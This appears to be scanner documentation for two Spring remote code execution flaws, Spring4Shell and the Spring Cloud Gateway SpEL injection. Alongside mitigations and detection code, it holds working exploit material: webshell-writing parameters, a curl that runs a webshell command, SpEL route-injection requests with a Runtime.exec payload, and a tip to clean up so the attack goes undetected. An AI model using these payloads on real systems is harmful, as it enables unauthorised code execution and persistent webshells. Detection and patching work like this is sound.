
Overview

Spring Framework is one of the most popular Java application frameworks. scan4all includes POCs for critical Spring vulnerabilities, including the infamous Spring4Shell (CVE-2022-22965).
These vulnerabilities affect a massive number of Java applications worldwide. Organizations using Spring Framework should prioritize testing and patching.

Supported Vulnerabilities

CVE-2022-22965 - Spring4Shell

CVE-2022-22965 (Spring4Shell)

Type: Remote Code Execution
Affected Versions: Spring Framework (running on JDK 9+)
Discovery Date: March 2022
CVSS Score: 9.8 (Critical)
Alternative Name: Spring4Shell
Description: Spring4Shell is a critical RCE vulnerability in Spring Framework affecting applications running on JDK 9 and above. The vulnerability exploits Spring’s data binding mechanism to gain access to the ClassLoader, allowing attackers to write malicious JSP files and achieve remote code execution.
Technical Details:
  • Attack Vector: HTTP parameter pollution via data binding
  • Requirements: JDK 9+ and Apache Tomcat as servlet container
  • Exploitation: Modifies Tomcat’s Access Log Valve pattern to write a webshell
Detection Method:
// Stage 1: Check if ClassLoader is accessible
GET /?class.module.classLoader[1]=1
// Expected: HTTP 500 (vulnerable)

GET /?class.module.classLoader=1
// Expected: HTTP 200 (vulnerable)
Exploitation Stages:
1. Access ClassLoader: exploit data binding to access the ClassLoader through class.module.classLoader.
2. Modify Access Log Pattern: change Tomcat’s access log pattern to write a JSP webshell.
3. Set Output Directory: configure the log output to the webapps/ROOT directory.
4. Trigger Log Write: make a request that triggers the access log to write the webshell.
5. Execute Commands: access the webshell and execute arbitrary commands.
POC Parameters:
class.module.classLoader.resources.context.parent.pipeline.first.pattern
class.module.classLoader.resources.context.parent.pipeline.first.suffix
class.module.classLoader.resources.context.parent.pipeline.first.directory
class.module.classLoader.resources.context.parent.pipeline.first.prefix
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat
Webshell Output:
  • Filename: tomcatwar.jsp
  • Location: webapps/ROOT/
  • Access: http://target/tomcatwar.jsp?pwd=j&cmd=id
Vulnerable Configuration:
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;

@Controller
public class VulnerableController {
    // Request parameters are bound onto the model attribute; on JDK 9+ the binder
    // can be steered to class.module.classLoader (the bean type here is illustrative)
    @GetMapping("/exploit")
    public String vulnerable(@ModelAttribute("form") Object form, Model model) {
        return "view";
    }
}
Verification:
# Check if webshell was created
curl "http://target/tomcatwar.jsp?pwd=j&cmd=id"

# Expected output:
uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)

CVE-2022-22947 - Spring Cloud Gateway RCE

CVE-2022-22947

Type: Remote Code Execution
Affected Versions: Spring Cloud Gateway releases before 3.1.1 and before 3.0.7 (fixed in 3.1.1 and 3.0.7, see Mitigation)
Discovery Date: March 2022
CVSS Score: 10.0 (Critical)
Requirement: Actuator endpoint enabled
Description: Spring Cloud Gateway allows remote code execution when the Gateway Actuator endpoint is enabled and exposed. Attackers can inject malicious SpEL (Spring Expression Language) expressions through the /actuator/gateway/routes endpoint.
Technical Details:
  • Component: Spring Cloud Gateway Actuator
  • Attack Vector: SpEL (Spring Expression Language) Injection
  • Requirements:
    • /actuator/gateway/routes endpoint enabled
    • Ability to POST to actuator endpoints
Exploitation Process:
1. Create Malicious Route: POST a malicious route definition with a SpEL expression to /actuator/gateway/routes/vtest.
2. Refresh Gateway: trigger a gateway refresh via POST to /actuator/gateway/refresh.
3. Execute Payload: access the route via GET to /actuator/gateway/routes/vtest to execute the SpEL expression.
4. Cleanup: delete the test route to avoid detection.
POC Payload:
{
  "id": "vtest",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{999*999}"
      }
    }
  ],
  "uri": "http://example.com",
  "order": 0
}
Detection:
# Step 1: Create route with test payload
curl -X POST http://target/actuator/gateway/routes/vtest \
  -H "Content-Type: application/json" \
  -d '{"id":"vtest","filters":[{"name":"AddResponseHeader","args":{"name":"Result","value":"#{999*999}"}}],"uri":"http://example.com","order":0}'

# Step 2: Refresh gateway
curl -X POST http://target/actuator/gateway/refresh

# Step 3: Check if SpEL executed (998001 = 999*999)
curl http://target/actuator/gateway/routes/vtest

# Step 4: Cleanup
curl -X DELETE http://target/actuator/gateway/routes/vtest
curl -X POST http://target/actuator/gateway/refresh
Command Execution Payload:
{
  "id": "vtest",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'id'}).getInputStream()))}"
      }
    }
  ],
  "uri": "http://example.com",
  "order": 0
}
Vulnerable Configuration:
application.yml
management:
  endpoints:
    web:
      exposure:
        include: gateway  # Vulnerable configuration

Usage

Scanning for Spring Vulnerabilities

# Scan a Spring application
scan4all -h http://springapp.example.com

# Scan with POC enabled
scan4all -h http://springapp.example.com -poc

# Test specific CVE
scan4all -h http://springapp.example.com -poc CVE-2022-22965

Identifying Spring Applications

HTTP Headers:
X-Application-Context: application
Server: Apache Tomcat
Common Endpoints:
/actuator
/actuator/health
/actuator/gateway/routes
/login
/error
Error Messages:
Whitelabel Error Page
Spring Framework
org.springframework

Mitigation

CVE-2022-22965 (Spring4Shell)

1. Upgrade Spring Framework:
  • Spring Framework 5.3.18+
  • Spring Framework 5.2.20+
  • Spring Boot 2.5.12+ or 2.6.6+
2. Downgrade JDK: if an upgrade is not possible, consider using JDK 8 (not vulnerable).
3. Implement WAF Rules: block requests containing “class.module.classLoader” in parameters.
4. Disable Data Binding: use @InitBinder to disallow Class and ClassLoader access.
Workaround Code:
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

@ControllerAdvice
public class SecurityConfig {
    // Applies to every controller's binder: property paths matching these
    // patterns are never bound, which cuts off the class.module.classLoader path
    @InitBinder
    public void initBinder(WebDataBinder binder) {
        String[] denylist = new String[]{"class.*", "Class.*", "*.class.*", "*.Class.*"};
        binder.setDisallowedFields(denylist);
    }
}
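To see why those four denylist patterns cover the POC property paths, here is an added example (not Spring's or scan4all's code) that re-implements in Python the wildcard rule Spring's DataBinder applies to setDisallowedFields, PatternMatchUtils.simpleMatch, and runs it over a constructed parameter map; the Java-to-Python translation and the sample parameters are assumptions.

```python
# Re-implementation (in Python, as an illustration) of the wildcard rule Spring's
# DataBinder applies to setDisallowedFields(): PatternMatchUtils.simpleMatch.
DENYLIST = ("class.*", "Class.*", "*.class.*", "*.Class.*")

def simple_match(pattern, s):
    """'*' matches any run of characters; mirrors simpleMatch's recursion."""
    first = pattern.find("*")
    if first == -1:
        return pattern == s
    if first == 0:
        if len(pattern) == 1:
            return True
        nxt = pattern.find("*", 1)
        if nxt == -1:
            return s.endswith(pattern[1:])
        part = pattern[1:nxt]
        if part == "":
            return simple_match(pattern[nxt:], s)
        idx = s.find(part)
        while idx != -1:
            if simple_match(pattern[nxt:], s[idx + len(part):]):
                return True
            idx = s.find(part, idx + 1)
        return False
    return (len(s) >= first and pattern[:first] == s[:first]
            and simple_match(pattern[first:], s[first:]))

def is_allowed(field, denylist=DENYLIST):
    """A bound field (its full nested property path) passes unless a denylist pattern matches it."""
    return not any(simple_match(p, field) for p in denylist)

def filter_request_params(params, denylist=DENYLIST):
    """Split parameter names into those the binder would apply and those it would skip."""
    allowed = {k: v for k, v in params.items() if is_allowed(k, denylist)}
    rejected = sorted(k for k in params if k not in allowed)
    return allowed, rejected

# Constructed request parameters: two legitimate form fields plus the property
# paths used by the Spring4Shell POC (nested under a bean property in the last case).
SAMPLE_PARAMS = {
    "name": "alice",
    "address.city": "Berlin",
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern": "x",
    "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",
    "class.module.classLoader[1]": "1",
    "user.class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",
}
```

Spring Framework 5.3.18 and 5.2.20 additionally made the disallowed-fields comparison case-insensitive, which is one more reason to upgrade rather than rely on the workaround alone.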

CVE-2022-22947 (Spring Cloud Gateway)

1. Upgrade Spring Cloud Gateway:
  • Spring Cloud Gateway 3.1.1+
  • Spring Cloud Gateway 3.0.7+
2. Secure Actuator Endpoints: restrict access to actuator endpoints using Spring Security.
3. Disable Gateway Actuator: if not needed, disable the gateway actuator endpoint.
4. Network Segmentation: only allow trusted networks to access actuator endpoints.
Secure Configuration:
application.yml
management:
  endpoints:
    web:
      exposure:
        include: health,info  # Only expose necessary endpoints
  endpoint:
    gateway:
      enabled: false  # Disable if not needed

spring:
  security:
    user:
      name: admin
      password: ${ACTUATOR_PASSWORD}  # Require authentication

Detection Indicators

Network Indicators

Spring4Shell (CVE-2022-22965):
  • Parameters containing class.module.classLoader
  • Long parameter names with multiple dots
  • Requests to suspicious JSP files
  • Parameters referencing pipeline, pattern, directory
Spring Cloud Gateway (CVE-2022-22947):
  • POST requests to /actuator/gateway/routes/*
  • JSON payloads with SpEL expressions #{...}
  • Sequential requests: POST route → POST refresh → GET route
  • Unusual filter names or values in route definitions

Log Patterns

class.module.classLoader
tomcatwar.jsp
/actuator/gateway/routes/
AddResponseHeader
T(java.lang.Runtime)
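As an added example (not scan4all code), the following Python turns the network indicators and log patterns above into a detector run over constructed Tomcat access-log lines, including the POST route, POST refresh, GET route sequence correlated per client; the log format, client addresses and indicator names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Tomcat access-log lines in common log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Mar/2022:10:00:01 +0000] "GET /?class.module.classLoader[1]=1 HTTP/1.1" 500 0
10.0.0.5 - - [30/Mar/2022:10:00:02 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=x HTTP/1.1" 200 0
10.0.0.5 - - [30/Mar/2022:10:00:03 +0000] "GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1" 200 42
10.0.0.9 - - [30/Mar/2022:10:01:00 +0000] "POST /actuator/gateway/routes/vtest HTTP/1.1" 201 0
10.0.0.9 - - [30/Mar/2022:10:01:01 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
10.0.0.9 - - [30/Mar/2022:10:01:02 +0000] "GET /actuator/gateway/routes/vtest HTTP/1.1" 200 512
192.0.2.7 - - [30/Mar/2022:10:02:01 +0000] "GET /login?user.name=bob HTTP/1.1" 200 15
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
ROUTE_RE = re.compile(r"^/actuator/gateway/routes/([^/]+)$")
PIPELINE_WORDS = ("pipeline", "pattern", "directory", "suffix", "prefix")

def analyze(log_text):
    """Return (client_ip, indicator, detail) tuples for lines matching the page's indicators."""
    alerts = []
    route_state = defaultdict(dict)  # client ip -> {route id: "created" | "refreshed" | "alerted"}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, url = m["ip"], m["method"], urlsplit(m["target"])
        names = [k for k, _ in parse_qsl(url.query, keep_blank_values=True)]
        # Spring4Shell: ClassLoader property paths, or deep dotted names naming Tomcat's log valve
        for n in names:
            low = n.lower()
            if "class.module.classloader" in low or (n.count(".") >= 3 and any(w in low for w in PIPELINE_WORDS)):
                alerts.append((ip, "spring4shell-binding-param", n))
                break
        if url.path.lower().endswith(".jsp") and "cmd" in names:
            alerts.append((ip, "spring4shell-webshell-access", url.path))
        # Spring Cloud Gateway: POST route -> POST refresh -> GET the same route, from one client
        rm = ROUTE_RE.match(url.path)
        if rm and method == "POST":
            route_state[ip][rm.group(1)] = "created"
        elif method == "POST" and url.path == "/actuator/gateway/refresh":
            for rid, st in route_state[ip].items():
                if st == "created":
                    route_state[ip][rid] = "refreshed"
        elif rm and method == "GET" and route_state[ip].get(rm.group(1)) == "refreshed":
            alerts.append((ip, "gateway-route-sequence", rm.group(1)))
            route_state[ip][rm.group(1)] = "alerted"
    return alerts
```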

Source Code Location

pocs_go/Springboot/
├── CVE-2022-22965.go
├── CVE-2022-22965_test.go
└── CVE-2022-22947.go

References

These are among the most critical Java vulnerabilities discovered in recent years. Immediate action is required for affected systems.
